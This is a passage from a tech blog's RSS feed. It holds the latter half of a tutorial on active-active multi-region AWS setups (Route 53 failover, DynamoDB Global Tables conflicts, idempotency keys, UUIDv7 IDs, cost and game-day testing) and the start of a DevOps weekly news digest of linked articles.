    &quot;FullyQualifiedDomainName&quot;: &quot;api-eu.example.com&quot;,
    &quot;Port&quot;: 443,
    &quot;RequestInterval&quot;: 10,
    &quot;FailureThreshold&quot;: 3
  }&#x27;</span>
</code></pre><p>Then point a latency record at each region and bind the health check:</p>
<pre><code class="hljs language-json"><span class="hljs-punctuation">{</span>
  <span class="hljs-attr">&quot;Comment&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;Active-active latency record for eu-west-1&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;Changes&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><span class="hljs-punctuation">{</span>
    <span class="hljs-attr">&quot;Action&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;UPSERT&quot;</span><span class="hljs-punctuation">,</span>
    <span class="hljs-attr">&quot;ResourceRecordSet&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
      <span class="hljs-attr">&quot;Name&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;api.example.com&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;Type&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;A&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;SetIdentifier&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;eu-west-1&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;Region&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;eu-west-1&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;AliasTarget&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
        <span class="hljs-attr">&quot;HostedZoneId&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;Z32O12XQLNTSW2&quot;</span><span class="hljs-punctuation">,</span>
        <span class="hljs-attr">&quot;DNSName&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;dualstack.alb-eu.eu-west-1.elb.amazonaws.com&quot;</span><span class="hljs-punctuation">,</span>
        <span class="hljs-attr">&quot;EvaluateTargetHealth&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-literal"><span class="hljs-keyword">true</span></span>
      <span class="hljs-punctuation">}</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;HealthCheckId&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;abcd1234-5678-90ab-cdef-1234567890ab&quot;</span>
    <span class="hljs-punctuation">}</span>
  <span class="hljs-punctuation">}</span><span class="hljs-punctuation">]</span>
<span class="hljs-punctuation">}</span>
</code></pre><pre><code class="hljs language-bash">aws route53 change-resource-record-sets \
  --hosted-zone-id Z123456789ABC \
  --change-batch file://latency-record-eu.json
</code></pre><p>The catch with DNS is TTL. Resolvers and clients cache records, so your real failover time is the health check interval times the failure threshold, plus the TTL. With a 10-second interval, a threshold of 3, and a 60-second TTL, expect roughly 90 seconds before most clients move. Some clients ignore TTL entirely and stay pinned for much longer.</p>
<p>You can watch a failover happen with <code>dig</code>:</p>
<pre><code class="hljs language-bash">$ dig +short api.example.com
<span class="hljs-comment"># eu-west-1 healthy, you are in Europe</span>
52.18.44.7

<span class="hljs-comment"># after eu-west-1 health check fails, query again</span>
$ dig +short api.example.com
18.234.91.2   <span class="hljs-comment"># now resolving to us-east-1</span>
</code></pre><p>If 90 seconds is too slow, or you serve non-HTTP traffic like gaming or IoT, use <strong>AWS Global Accelerator</strong> instead. It hands you two static anycast IPs and routes over the AWS backbone to the nearest healthy region. Failover is sub-30 seconds because it does not depend on DNS caching. It costs about $18 a month per accelerator plus data transfer, so reach for it only when you need that speed.</p>
<h2 id="h2-replicating-data-without-losing-writes" class="group relative scroll-mt-24">
        <a href="#h2-replicating-data-without-losing-writes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Replicating data without losing writes
        </a>
        </h2><p>This is where active-active gets hard. Two regions accepting writes at the same time will conflict, and how you handle that conflict decides whether your design is sound or quietly losing data.</p>
<h3 id="h3-dynamodb-global-tables-for-multi-region-writes" class="group relative scroll-mt-24">
        <a href="#h3-dynamodb-global-tables-for-multi-region-writes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          DynamoDB Global Tables for multi-region writes
        </a>
        </h3><p>DynamoDB Global Tables replicate writes between regions asynchronously, usually within a second. Every region accepts writes locally. Turn it on by adding a replica:</p>
<pre><code class="hljs language-bash">aws dynamodb update-table \
  --table-name orders \
  --region us-east-1 \
  --replica-updates <span class="hljs-string">&#x27;[{&quot;Create&quot;: {&quot;RegionName&quot;: &quot;eu-west-1&quot;}}]&#x27;</span>
</code></pre><p>Conflict resolution is last-writer-wins, based on the wall clock of the region that did the write. If two regions update the same item in the same second, one update silently disappears. That is fine for naturally partitioned data like per-user state. It is dangerous for shared counters or hot keys.</p>
<p>The fix for hot keys is to not write the same item from two regions. Partition writes by key so a given record is only ever written from one region, or use atomic counters and CRDTs for data that genuinely needs to merge.</p>
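<p>The lost update and the region-owned fix described above, as an added example that is not from the original post. It is a constructed in-memory model of last-writer-wins replication: the <code>Replica</code> class, the <code>replicate</code> function, the key names and the timestamps are assumptions for illustration, not DynamoDB's API. The second scenario extends "write each record from one region" into a per-region counter that readers sum.</p>

```python
"""Constructed model of last-writer-wins (LWW) replication between two regions.

Nothing here calls AWS; it only mirrors the conflict rule the text describes.
"""
from dataclasses import dataclass, field


@dataclass
class Replica:
    """One region's copy of a table: key -> (value, write_timestamp, writer_region)."""
    region: str
    items: dict = field(default_factory=dict)

    def put(self, key, value, ts):
        self.items[key] = (value, ts, self.region)

    def get(self, key, default=0):
        return self.items.get(key, (default,))[0]


def replicate(a, b):
    """Exchange writes in both directions, keeping the latest version per item.

    The later timestamp wins; ties break on region name so both replicas
    converge on the same winner. The losing write is discarded without error.
    """
    for key in set(a.items) | set(b.items):
        versions = [r.items[key] for r in (a, b) if key in r.items]
        winner = max(versions, key=lambda v: (v[1], v[2]))
        a.items[key] = winner
        b.items[key] = winner


def shared_counter_lost_update():
    """Both regions read-modify-write the SAME item inside the replication lag."""
    us, eu = Replica("us-east-1"), Replica("eu-west-1")
    us.put("page_views", 10, ts=100.00)
    replicate(us, eu)                       # both regions now see 10
    us.put("page_views", us.get("page_views") + 1, ts=101.20)
    eu.put("page_views", eu.get("page_views") + 1, ts=101.75)
    replicate(us, eu)                       # eu's write is later, us's is dropped
    return us.get("page_views"), eu.get("page_views")


def counter_total(replica, name):
    """Readers sum every region-owned slot of the counter."""
    prefix = name + "#"
    return sum(v[0] for k, v in replica.items.items() if k.startswith(prefix))


def region_owned_counter():
    """Each region only ever writes its own slot, so LWW never sees a conflict."""
    us, eu = Replica("us-east-1"), Replica("eu-west-1")
    for replica in (us, eu):
        replica.put("page_views#" + replica.region, 5, ts=100.00)
    replicate(us, eu)                       # total is 10 in both regions
    for replica, ts in ((us, 101.20), (eu, 101.75)):
        slot = "page_views#" + replica.region
        replica.put(slot, replica.get(slot) + 1, ts)
    replicate(us, eu)
    return counter_total(us, "page_views"), counter_total(eu, "page_views")


if __name__ == "__main__":
    print("shared item, two increments from 10:", shared_counter_lost_update())
    print("region-owned slots, two increments from 10:", region_owned_counter())
```

<p>Both replicas converge in each scenario; the difference is that the shared item converges on a value that is missing one increment, and nothing in the write path reports it.</p>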
<h3 id="h3-aurora-global-database-is-not-active-active-for-writes" class="group relative scroll-mt-24">
        <a href="#h3-aurora-global-database-is-not-active-active-for-writes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Aurora Global Database is not active-active for writes
        </a>
        </h3><p>Be honest with yourself here. Aurora Global Database replicates a primary region to up to five secondaries at the storage layer, typically under a second of lag. The secondaries are <strong>read-only</strong>. Only one region accepts writes.</p>
<p>So Aurora Global is active-active for reads and active-passive for writes. If your app sends a write to the secondary region, you get this:</p>
<pre><code class="hljs language-text">ERROR 1290 (HY000): The MySQL server is running with the
--read-only option so it cannot execute this statement
</code></pre><p>You have two real options. Either send all writes to the primary region from both app tiers (and accept the cross-region write latency for users far from the primary), or shard your relational data by region so each region owns its own slice. There is no managed multi-writer Aurora across regions that you should bet a production system on today.</p>
<h2 id="h2-the-application-changes-nobody-warns-you-about" class="group relative scroll-mt-24">
        <a href="#h2-the-application-changes-nobody-warns-you-about" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The application changes nobody warns you about
        </a>
        </h2><p>You can wire up all the AWS pieces and still corrupt data, because active-active breaks assumptions baked into most application code.</p>
<h3 id="h3-every-write-needs-an-idempotency-key" class="group relative scroll-mt-24">
        <a href="#h3-every-write-needs-an-idempotency-key" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Every write needs an idempotency key
        </a>
        </h3><p>In multi-region you will have retries, dual delivery during replication lag, and clients that hit a different region after a failover. Without idempotency, a payment gets processed twice and the customer calls support.</p>
<p>Require a client-supplied idempotency key on every write and store it long enough to outlive cross-region replication, 24 hours or more. In DynamoDB, a conditional write does the dedupe for you:</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">import</span> boto3
<span class="hljs-keyword">from</span> botocore.exceptions <span class="hljs-keyword">import</span> ClientError

table = boto3.resource(<span class="hljs-string">&quot;dynamodb&quot;</span>).Table(<span class="hljs-string">&quot;charges&quot;</span>)

<span class="hljs-keyword">def</span> <span class="hljs-title function_">create_charge</span>(<span class="hljs-params">idempotency_key: <span class="hljs-built_in">str</span>, amount: <span class="hljs-built_in">int</span></span>):
    <span class="hljs-keyword">try</span>:
        table.put_item(
            Item={<span class="hljs-string">&quot;pk&quot;</span>: idempotency_key, <span class="hljs-string">&quot;amount&quot;</span>: amount, <span class="hljs-string">&quot;status&quot;</span>: <span class="hljs-string">&quot;captured&quot;</span>},
            <span class="hljs-comment"># only write if this key was never seen before</span>
            ConditionExpression=<span class="hljs-string">&quot;attribute_not_exists(pk)&quot;</span>,
        )
    <span class="hljs-keyword">except</span> ClientError <span class="hljs-keyword">as</span> e:
        <span class="hljs-keyword">if</span> e.response[<span class="hljs-string">&quot;Error&quot;</span>][<span class="hljs-string">&quot;Code&quot;</span>] == <span class="hljs-string">&quot;ConditionalCheckFailedException&quot;</span>:
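            <span class="hljs-comment"># duplicate request, return the existing result, do not charge again</span>
            <span class="hljs-comment"># strongly consistent read, so the item that just failed the condition is always visible</span>
            <span class="hljs-keyword">return</span> table.get_item(Key={<span class="hljs-string">&quot;pk&quot;</span>: idempotency_key}, ConsistentRead=<span class="hljs-literal">True</span>)[<span class="hljs-string">&quot;Item&quot;</span>]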
        <span class="hljs-keyword">raise</span>
</code></pre><p>The retry that would have double-charged now hits the condition and returns the original result:</p>
<pre><code class="hljs language-text">botocore.errorfactory.ConditionalCheckFailedException:
An error occurred (ConditionalCheckFailedException) when calling
the PutItem operation: The conditional request failed
</code></pre><p>That error is not a bug. That is the system protecting you.</p>
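<p>An added example, not code from the original post: the same put-if-absent dedupe, extended so the stored record is scoped to the caller, bound to a hash of the request body, and given a 24-hour expiry. <code>FakeTable</code>, <code>caller_id</code>, <code>request_hash</code>, <code>expires_at</code>, and <code>IdempotencyConflict</code> are assumptions made for this sketch, and the in-memory table stands in for DynamoDB so it runs offline.</p>

```python
import hashlib
import json

TTL_SECONDS = 24 * 60 * 60  # retention floor named in the post: 24 hours or more


class ConditionalCheckFailed(Exception):
    """Stand-in for DynamoDB's ConditionalCheckFailedException."""


class IdempotencyConflict(Exception):
    """The same key was replayed with a different request body."""


class FakeTable:
    """In-memory stand-in (assumption) for a table with put-if-absent semantics."""

    def __init__(self):
        self.items = {}

    def put_if_absent(self, pk, item, now):
        existing = self.items.get(pk)
        # An expired record counts as absent. DynamoDB TTL deletion is not
        # immediate, so a real condition would also compare the expiry attribute.
        if existing is not None and existing["expires_at"] > now:
            raise ConditionalCheckFailed(pk)
        self.items[pk] = item

    def get(self, pk):
        return self.items[pk]


def fingerprint(payload):
    """Stable hash of the request body, so key reuse with new parameters is visible."""
    canonical = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode()).hexdigest()


def create_charge(table, ledger, caller_id, idempotency_key, payload, now):
    """Return (record, replayed). The ledger append is the side effect to protect."""
    # Composite key (partition key + sort key in a real table): two callers
    # that pick the same idempotency key never see each other's result.
    pk = (caller_id, idempotency_key)
    record = {
        "request_hash": fingerprint(payload),
        "amount": payload["amount"],
        "status": "captured",
        "expires_at": now + TTL_SECONDS,
    }
    try:
        table.put_if_absent(pk, record, now)
    except ConditionalCheckFailed:
        stored = table.get(pk)
        if stored["request_hash"] != record["request_hash"]:
            # Same key, different body: refuse instead of returning a result
            # that does not match what the caller just asked for.
            raise IdempotencyConflict(idempotency_key)
        return stored, True
    ledger.append((caller_id, payload["amount"]))
    return record, False


def demo():
    table, ledger = FakeTable(), []
    body = {"amount": 1999, "currency": "usd"}  # constructed sample request
    t0 = 1_700_000_000                          # constructed timestamp (epoch seconds)

    first = create_charge(table, ledger, "cust_a", "key-1", body, t0)
    retry = create_charge(table, ledger, "cust_a", "key-1", body, t0 + 30)
    try:
        changed = {"amount": 1, "currency": "usd"}
        create_charge(table, ledger, "cust_a", "key-1", changed, t0 + 60)
        changed_body = "accepted"
    except IdempotencyConflict:
        changed_body = "rejected"
    other = create_charge(table, ledger, "cust_b", "key-1", body, t0 + 90)
    # A retry that arrives after the retention window is a brand-new charge,
    # which is why the window has to outlive every retry and replication delay.
    late = create_charge(table, ledger, "cust_a", "key-1", body, t0 + TTL_SECONDS + 1)

    return {
        "first_replayed": first[1],
        "retry_replayed": retry[1],
        "retry_amount": retry[0]["amount"],
        "changed_body": changed_body,
        "other_caller_replayed": other[1],
        "late_replayed": late[1],
        "charges_made": len(ledger),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```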
<h3 id="h3-drop-auto-increment-ids" class="group relative scroll-mt-24">
        <a href="#h3-drop-auto-increment-ids" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Drop auto-increment IDs
        </a>
        </h3><p>Two regions that each hand out auto-increment IDs on <code>INSERT</code> will both generate ID <code>4892</code> for different records. When replication catches up, you get duplicate primary keys and a merge failure. Generate globally unique IDs in the application instead. Use <strong>UUIDv7</strong> or <strong>ULID</strong> so the IDs are time-ordered and still index well:</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">from</span> uuid_extensions <span class="hljs-keyword">import</span> uuid7   <span class="hljs-comment"># time-ordered, sortable, no coordination</span>

order_id = <span class="hljs-built_in">str</span>(uuid7())
<span class="hljs-comment"># &#x27;018f9b2a-7c3e-7def-8a1b-2c4d6e8f0a12&#x27;</span>
</code></pre><p>UUIDv4 works too, but random IDs fragment your B-tree indexes on large tables. Pick UUIDv7 or ULID for anything that grows.</p>
<h3 id="h3-keep-session-state-out-of-the-app-server" class="group relative scroll-mt-24">
        <a href="#h3-keep-session-state-out-of-the-app-server" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Keep session state out of the app server
        </a>
        </h3><p>The user&#39;s next request might land in a different region, so local memory and a region-pinned Redis will not survive failover. Use stateless signed tokens (JWT) when you can live with the revocation complexity, or a replicated store like DynamoDB Global Tables for shopping carts and longer sessions.</p>
<h2 id="h2-what-it-actually-costs-and-how-to-test-it" class="group relative scroll-mt-24">
        <a href="#h2-what-it-actually-costs-and-how-to-test-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What it actually costs and how to test it
        </a>
        </h2><p>The duplicated compute is the obvious cost. The ones that surprise people on the bill:</p>
<ul>
<li>Inter-region data transfer at roughly $0.02 per GB for replication, which adds up fast on a write-heavy app</li>
<li>DynamoDB Global Tables charging replicated write capacity in every region</li>
<li>Aurora Global Database charging replicated storage in every region</li>
<li>Engineering time spent debugging consistency bugs and running game days</li>
</ul>
<p>Budget at least 2.2x your single-region cost. In year one, the engineering tax is bigger than the infrastructure tax.</p>
<p>And test it. The whole reason to go active-active is that the standby is verified working every second, so do not let that promise rot. Run a game day at least quarterly. Use AWS Fault Injection Simulator to cut a region off, or just disable a health check and watch traffic shift:</p>
<pre><code class="hljs language-bash">aws route53 update-health-check \
  --health-check-id abcd1234-5678-90ab-cdef-1234567890ab \
  --disabled
</code></pre><p>Watch the traffic move in your dashboards, confirm writes still succeed, then test the failback too. If the team is nervous about running this test, that nervousness is exactly the signal that you need to run it.</p>
<h2 id="h2-next-steps" class="group relative scroll-mt-24">
        <a href="#h2-next-steps" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Next steps
        </a>
        </h2><p>Pick one path and start small:</p>
<ol>
<li>Write down your RTO and RPO targets in real numbers and confirm multi-AZ truly cannot meet them. If it can, stop and save the money.</li>
<li>Add idempotency keys to every write API in your current single-region app. This is the highest-value change and you can do it today, before any multi-region work.</li>
<li>Move one bounded, naturally partitioned dataset (sessions or per-user state) to DynamoDB Global Tables and prove replication works end to end.</li>
<li>Stand up the second region&#39;s app tier behind a Route 53 latency record with a real <code>/healthz</code> check, then run a game day and disable one region.</li>
<li>Only after steps 1 through 4 feel boring should you tackle the relational data, which is the genuinely hard part.</li>
</ol>
<p>Do them in that order. Most teams that fail at multi-region fail because they bought the infrastructure before they fixed the application.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 25, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-25</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 15 Jun 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-25</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        </h2><h3 id="h3-six-live-kubernetes-recommendations-aks-cilium-rate-limiting-and-more" class="group relative scroll-mt-24">
        <a href="#h3-six-live-kubernetes-recommendations-aks-cilium-rate-limiting-and-more" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Six Live Kubernetes Recommendations: AKS, Cilium, Rate Limiting, and More
        </a>
        </h3><p>On June 10th, Engin and I ran a live workshop building an AKS cluster, an Azure Container Registry, and a random-cat web app from scratch in C#. This is the writeup, including the parts we didn’t get </p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/getting-started-aks-pulumi-csharp/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-spotlight-on-sig-storage" class="group relative scroll-mt-24">
        <a href="#h3-spotlight-on-sig-storage" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Spotlight on SIG Storage
        </a>
        </h3><p>In our ongoing SIG Spotlight series, we shine a light on the groups that keep the Kubernetes project moving forward. This time, we catch up with SIG Storage, the group responsible for persistent data,</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/15/sig-storage-spotlight-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-agent-sandbox-with-lovable-with-jonathan-grahl" class="group relative scroll-mt-24">
        <a href="#h3-agent-sandbox-with-lovable-with-jonathan-grahl" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Agent Sandbox with Lovable, with Jonathan Grahl
        </a>
        </h3><p>In this episode we speak to Jonathan Grahl. Jonathan is the Team Lead of Infrastructure at Lovable where he oversees the platform stack the company runs on. We talked about Kubernetes, Sandboxes and C</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Kubernetes Podcast</strong></p>
<p><a href="https://e780d51f-f115-44a6-8252-aed9216bb521.libsyn.com/agent-sandbox-with-lovable-with-jonathan-grahl"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-next-era-of-telco-clouds-get-open-infrastructure-choice-with-sylva-and-canonical-kubernetes" class="group relative scroll-mt-24">
        <a href="#h3-the-next-era-of-telco-clouds-get-open-infrastructure-choice-with-sylva-and-canonical-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The next era of telco clouds: get open infrastructure choice with Sylva and Canonical Kubernetes
        </a>
        </h3><p>Achieving vendor neutrality in telco clouds requires an infrastructure layer that respects open standards, without wrapping them in rigid platform layers. By combining upstream alignment with up to 15</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/the-next-era-of-telco-clouds-get-open-infrastructure-choice-with-sylva-and-canonical-kubernetes"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scylladb-operator-121-release-with-oracle-kubernetes-engine-oke-support" class="group relative scroll-mt-24">
        <a href="#h3-scylladb-operator-121-release-with-oracle-kubernetes-engine-oke-support" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 ScyllaDB Operator 1.21 Release — with Oracle Kubernetes Engine (OKE) Support
        </a>
        </h3><p>Introducing Oracle Kubernetes Engine support, stronger TLS, and a lighter dependency footprint</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/10/scylladb-operator-1-21-release-with-oracle-kubernetes-engine-oke-support/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-solving-secret-sprawl-in-multi-account-kubernetes-with-external-secrets-operator" class="group relative scroll-mt-24">
        <a href="#h3-solving-secret-sprawl-in-multi-account-kubernetes-with-external-secrets-operator" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Solving secret sprawl in multi-account Kubernetes with External Secrets Operator
        </a>
        </h3><p>Infrastructure provisioning in Kubernetes has become increasingly automated, but secret management often remains a challenge as environments grow. Organizations commonly separate development, staging,</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/09/solving-secret-sprawl-in-multi-account-kubernetes-with-external-secrets-operator/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-conflict-management-in-intent-based-networks" class="group relative scroll-mt-24">
        <a href="#h3-conflict-management-in-intent-based-networks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Conflict management in intent-based networks
        </a>
        </h3><p>The theme for TM Forum Digital Transformation World (DTW) Ignite 2026 in Copenhagen is &quot;The Future. Faster.&quot; As we move further into the decade, connectivity has evolved from a utility into the centra</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/conflict-management-intent-based-networks"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        </h2><h3 id="h3-improving-arm64-support-in-cncf-projects-with-oci-credits" class="group relative scroll-mt-24">
        <a href="#h3-improving-arm64-support-in-cncf-projects-with-oci-credits" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Improving Arm64 support in CNCF projects with OCI credits
        </a>
        </h3><p>In recent years, Arm64 has been taking the cloud service provider world by storm. Recent reports indicate that, as of the end of 2025, over 50% of new instances on AWS and over 33% on Azure...</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/15/improving-arm64-support-in-cncf-projects-with-oci-credits/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-verifiable-execution-in-dapr-118" class="group relative scroll-mt-24">
        <a href="#h3-introducing-verifiable-execution-in-dapr-118" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing Verifiable Execution in Dapr 1.18
        </a>
        </h3><p>Bringing attestation, provenance, and tamper-evident execution history to workflows and AI agents For years, the cloud native ecosystem has focused on making distributed systems resilient. Application</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/11/introducing-verifiable-execution-in-dapr-1-18/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-docker-hardened-images-enhanced-vulnerability-scanning-with-docker-and-aikido" class="group relative scroll-mt-24">
        <a href="#h3-docker-hardened-images-enhanced-vulnerability-scanning-with-docker-and-aikido" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Docker Hardened Images enhanced vulnerability scanning with Docker and Aikido
        </a>
        </h3><p>Aikido now scans Docker Hardened Images (DHI) with built-in VEX support. Vulnerabilities that Docker has verified as non-exploitable drop out of the queue automatically, so developers spend their time</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/docker-hardened-images-enhanced-vulnerability-scanning-with-docker-and-aikido/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-better-together-amazon-eks-auto-mode-and-istio-ambient-mesh" class="group relative scroll-mt-24">
        <a href="#h3-better-together-amazon-eks-auto-mode-and-istio-ambient-mesh" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Better Together: Amazon EKS Auto Mode and Istio Ambient Mesh
        </a>
        </h3><p>In this post, you will learn how Amazon EKS Auto Mode and Istio Ambient Mesh work together to automate infrastructure management while providing automatic mTLS-based service-to-service security, helpi</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/better-together-amazon-eks-auto-mode-and-istio-ambient-mesh/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        </h2><h3 id="h3-github-removes-pat-requirement-for-agentic-workflows" class="group relative scroll-mt-24">
        <a href="#h3-github-removes-pat-requirement-for-agentic-workflows" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub Removes PAT Requirement for Agentic Workflows
        </a>
        </h3><p>GitHub Agentic Workflows can now use GitHub Actions&#39; built-in GITHUB_TOKEN instead of a personal access token (PAT). That means developers no longer need to create, store, or rotate a PAT to run agent</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/github-removes-pat-requirement-for-agentic-workflows/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-we-made-github-copilot-cli-more-selective-about-delegation" class="group relative scroll-mt-24">
        <a href="#h3-how-we-made-github-copilot-cli-more-selective-about-delegation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How we made GitHub Copilot CLI more selective about delegation
        </a>
        </h3><p>Better orchestration, fewer handoffs, faster progress, without a single new knob.</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/how-we-made-github-copilot-cli-more-selective-about-delegation/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-cicd-for-an-open-source-project-locking-down-dependencies" class="group relative scroll-mt-24">
        <a href="#h3-securing-cicd-for-an-open-source-project-locking-down-dependencies" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing CI/CD for an open source project: Locking down dependencies
        </a>
        </h3><p>Part two: This is the second post in a three-part series on how Cilium hardens its CI/CD pipeline. Part 1 covered access control: who can trigger builds and what code CI is allowed to execute. This...</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/12/securing-ci-cd-for-an-open-source-project-locking-down-dependencies/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-availability-report-may-2026" class="group relative scroll-mt-24">
        <a href="#h3-github-availability-report-may-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub availability report: May 2026
        </a>
        </h3><p>In May, we experienced nine incidents that resulted in degraded performance across GitHub services.</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/news-insights/company-news/github-availability-report-may-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-speed-isnt-the-risk-lack-of-control-is" class="group relative scroll-mt-24">
        <a href="#h3-speed-isnt-the-risk-lack-of-control-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Speed isn't the risk. Lack of control is.
        </a>
